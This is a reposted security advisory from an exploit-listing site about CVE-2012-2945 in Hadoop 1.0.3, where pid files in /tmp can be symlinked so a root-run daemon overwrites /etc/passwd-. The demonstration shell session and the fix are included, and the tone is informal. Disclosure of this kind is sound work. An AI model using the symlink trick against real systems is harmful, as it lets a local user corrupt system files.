Security home

 

Home / exploitsPDF  

Hadoop 1.0.3 Symlink

Posted on 03 July 2012

Software : hadoop-1.0.3 Vulnerability : Symlink Problem type : local CVE ID : CVE-2012-2945 Date : May 28, 2012 Affected : min May 08, 2012 Symptom: $ echo $JAVA_HOME /usr/lib/jvm/java-7-openjdk $ file /tmp/hadoop-root-tasktracker.pid /tmp/hadoop-root-tasktracker.pid: symbolic link to `/etc/passwd-' $ sh bin/start-all.sh starting namenode, logging to /home/cloudopfer/src/hadoop-1.0.3/libexec/../logs/hadoop-root-namenode-t0.out root@localhost's password: localhost: starting datanode, logging to /home/cloudopfer/src/hadoop-1.0.3/libexec/../logs/hadoop-root-datanode-t0.out root@localhost's password: localhost: starting secondarynamenode, logging to /home/cloudopfer/src/hadoop-1.0.3/libexec/../logs/hadoop-root-secondarynamenode-t0.out starting jobtracker, logging to /home/cloudopfer/src/hadoop-1.0.3/libexec/../logs/hadoop-root-jobtracker-t0.out root@localhost's password: localhost: starting tasktracker, logging to /home/cloudopfer/src/hadoop-1.0.3/libexec/../logs/hadoop-root-tasktracker-t0.out $ tail -1 /etc/passwd- 10544 Problem: $ grep tmp src/hadoop-1.0.3/conf/hadoop-env.sh # The directory where pid files are stored. /tmp by default. as pointed out by CVE Team: "Incidentally, it seems that in Hadoop 1.x, only the HADOOP_PID_DIR setting is affected, but in Hadoop 2.x, both the HADOOP_PID_DIR and HADOOP_SECURE_DN_PID_DIR settings might be affected: http://svn.apache.org/repos/asf/hadoop/common/branches/branch-2/hadoop-common-project/hadoop-common/src/main/conf/hadoop-env.sh # The directory where pid files are stored. /tmp by default. export HADOOP_PID_DIR=${HADOOP_PID_DIR} export HADOOP_SECURE_DN_PID_DIR=${HADOOP_PID_DIR} " Solution: Hadoop Cloud Specialists (lol) should edit conf/hadoop-env and change the pid file directory to something sane. Impact: Low Timeline: May 25 - got drunk May 26 - got drunk May 27 - MARK - May 28 - playing around with hadoop - notified security@ - got reply, clarified things Jul 01 - get rid of this ;) Greetings: To CVE Team! To srm, Dude! To the usual suspects To those, who trust me. To all who stay real. Simon .

 

TOP

Malware :

Exploits :